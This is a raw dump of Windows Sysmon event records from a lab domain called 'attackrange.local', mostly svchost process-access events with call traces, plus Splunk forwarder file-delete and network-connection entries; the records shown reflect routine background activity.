12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291416Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291415Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291414Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291413Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291412Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291411Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291410Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4B5-6086-6401-00000000BB01}5024C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291409Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291408Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291407Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291406Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291405Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291404Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291403Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291402Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291401Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291400Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291399Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291398Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291397Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291396Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291395Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291394Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291393Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000291392Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.758{BEA10069-D0C2-6086-0D00-00000000BB01}792812C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291391Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.112{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=54C76A4AA8C0DA5885F0EAA22E5B2ECB,SHA256=8163DD27A9F911D9760323F0B684405A404E3736613E52C851190EE1665E253F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291390Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:08.112{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC6604F4848BCFB2B3EC35B40631D45F,SHA256=2D24883130387FEF4B5D9650F30E45177223EA606049EC7FC8A7EE77A2C3CA8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440215Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:08.135{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440214Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:08.135{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440219Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:09.325{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C173C46C3541BAB6E1806BDEE2E0A77,SHA256=153E86DCCF8D0F54912D78A9BF79FDA0D73E4D1D59CA7B0CA5B54A03BECE6B73,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291422Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:06.394{BEA10069-D13E-6086-9900-00000000BB01}408C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50611-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8089- 23542300x8000000000000000291421Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:23:09.376{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=963BB17949891AEC9322C6A2E849D660,SHA256=516A48DCFC38D6E467FD5979A817C0D11FC17B04B193450E245F239377D0D638,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000440218Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:09.136{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440217Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:23:09.136{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000440223Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 